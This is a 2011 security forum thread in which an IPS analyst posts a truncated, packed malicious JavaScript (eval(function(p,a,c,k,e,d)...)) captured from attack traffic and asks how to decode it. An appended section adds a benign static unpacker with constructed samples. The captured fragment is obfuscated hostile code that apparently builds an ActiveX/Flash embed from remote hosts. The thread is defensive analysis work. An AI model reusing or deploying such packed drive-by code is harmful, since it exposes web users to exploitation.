   yeastblue
   About eval

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_Web&no=77


Hello. I am someone who monitors an IPS. One day, looking at the raw data, I saw malicious javascript attacks built with eval coming in continuously. From the Src IP, malicious javascript keeps coming in at several thousand events a day. The problem is decoding the raw data below; the malicious javascript attack made by dean is quite hard to analyze. I'm sorry to ask, but please teach me how to decode the raw data below. ㅠ.ㅠ I have already tried alert. But an error message popup appears saying it is an invalid transmission.
=>eval(function(p,a,c,k,e,d)
{
        e=function(c)
        {
                return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35? String.fromCharCode(c+29):c.toString(36))
        };
if(!''.replace(/^/,String))
{
        while(c--)
        {
                d[e(c)]=k[c]||e(c)
        }
k=[function(e){        return d[e]}];e=function(){return'\\w+'};c=1};while(c--)
{
if(k[c])
        {
                p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
        }
}
return p
}
('3 1w="b://O.p.k/I/";3 1x=[];3 K=1y D();K[0]=D("1u","0","2","",1,1r,0,0,1s,1t,0,"1z","1A","1G",1,0.4,"1H",1);3 1I=D("1E.c","E.c","H");3 B=[];3 z=[];3 A=[];3 F=[];3 y=[];3 G=[];B[0]="b://1B.p.k/1C/1D.1q?t=1p";z[0]="1c.c";A[0]="b://1d.1e.L/1b/?1a";F[0]="E.c";y[0]="H";G[0]="J";B[1]="b://17.18.19.L/1g.1m?1n=1o&1l=1k";z[1]="1i.c";A[1]="#";F[1]="E.c";y[1]="H";G[1]="J";3 24=25;3 2a=j;3 2b,2j;3 2h;P N(){u(!f.S("l")){3 a=f.2g("9");a.5="l";f.2f.2d(a);a.e.d=1;a.e.g=1;a.e.21="1Q"}3 i="ɡ 5=\\"1R\\" >";i+=M(\'b://O.p.k/I/1N.1S\',\'R\',\'R\',\'1Z\',\'\',\'\',\'20\');i+="</9>";3 r=f.S(\'l\');u(r){r.1U=i}}P M(v,w,h,5,q,s,o){u(1M.2e=="2c 29 1j"){3 n="<Q 1T=\'C j\' 2i=\'1W:1V-1X-1Y-1L-1O\' 15=\'12/x-11-10\' g=\'"+w+"\' d=\'"+h+"\' 5=\'"+5+"\' 6=\'"+5+"\' Y=\'Z\'>"+"ɠ 6=\'23\' 7=\'"+v+"\' />"+"ɠ 6=\'14\' 7=\'"+s+"\' />"+"ɠ 6=\'X\' 7=\'"+o+"\' />"+"ɠ 6=\'6\' 7=\'"+5+"\' />"+"ɠ 6=\'W\' 7=\'j\' />"+"ɠ 6=\'V\' 7=\'T\' />"+"ɠ 6=\'27\'7=\'13\' /

  Hit : 3251     Date : 2011/10/05 12:29



    
xzvsda The source looks cut off; please upload the original as an attachment. 2011/10/05  
yeastblue So it really is cut off, right? ㅠ.ㅠ It is raw data that came out of the IPS. There is no attachment. ㅠ.ㅠ Even when I go to the Src IP in question, it only shows "Under preparation", and the Src IPs in several places all show the same "Under preparation". ㅠ.ㅠ Is it possible to interpret the part above to some extent, even though it is cut off? ㅠ.ㅠ 2011/10/05  
rocket07 What is this!! Haha, it's confusing 2012/01/21  
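
Added example, not part of the original thread or the captured data: a static unpacker for the eval(function(p,a,c,k,e,d){...}) format asked about above, which rebuilds the script text without calling eval() and returns null when the capture ends before the '...'.split('|') keyword list, since the tokens cannot be resolved without it. The function names (encodeIndex, unescapeLiteral, extractArgs, unpack) and both sample strings are constructed for illustration.

```javascript
// Added example: static unpacker for eval(function(p,a,c,k,e,d){...}) scripts.
// It never calls eval(); it only rebuilds the text the packed script would run.

// Same token encoding as e() in the posted decoder: index -> base-`a` word.
function encodeIndex(c, a) {
  const head = c < a ? '' : encodeIndex(Math.floor(c / a), a);
  const r = c % a;
  return head + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}

// Undo the backslash escapes of a single-quoted JavaScript string literal.
function unescapeLiteral(s) {
  const named = { n: '\n', r: '\r', t: '\t' };
  return s.replace(/\\(.)/g, (m, ch) => (ch in named ? named[ch] : ch));
}

// Pull (p, a, c, k) out of captured text. Returns null when the capture ends
// before the '...'.split('|') keyword list, i.e. the payload is truncated.
function extractArgs(raw) {
  const re = /\}\s*\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;
  const m = re.exec(raw);
  if (!m) return null;
  return { p: unescapeLiteral(m[1]), a: Number(m[2]), c: Number(m[3]), k: m[4].split('|') };
}

// Replace every token in p with its keyword; an empty slot keeps the token.
function unpack(raw) {
  const args = extractArgs(raw);
  if (!args) return null;
  const dict = new Map();
  for (let i = 0; i < args.c; i++) {
    const token = encodeIndex(i, args.a);
    dict.set(token, args.k[i] || token);
  }
  return args.p.replace(/\b\w+\b/g, (w) => (dict.has(w) ? dict.get(w) : w));
}

// Constructed samples (not the captured data from the post).
const COMPLETE = String.raw`eval(function(p,a,c,k,e,d){/* decoder omitted */return p}('1 0=\'2\';3(0);',62,4,'msg|var|hello|alert'.split('|'),0,{}))`;
const TRUNCATED = COMPLETE.slice(0, COMPLETE.indexOf("',62"));

console.log(unpack(COMPLETE));
console.log(unpack(TRUNCATED));
```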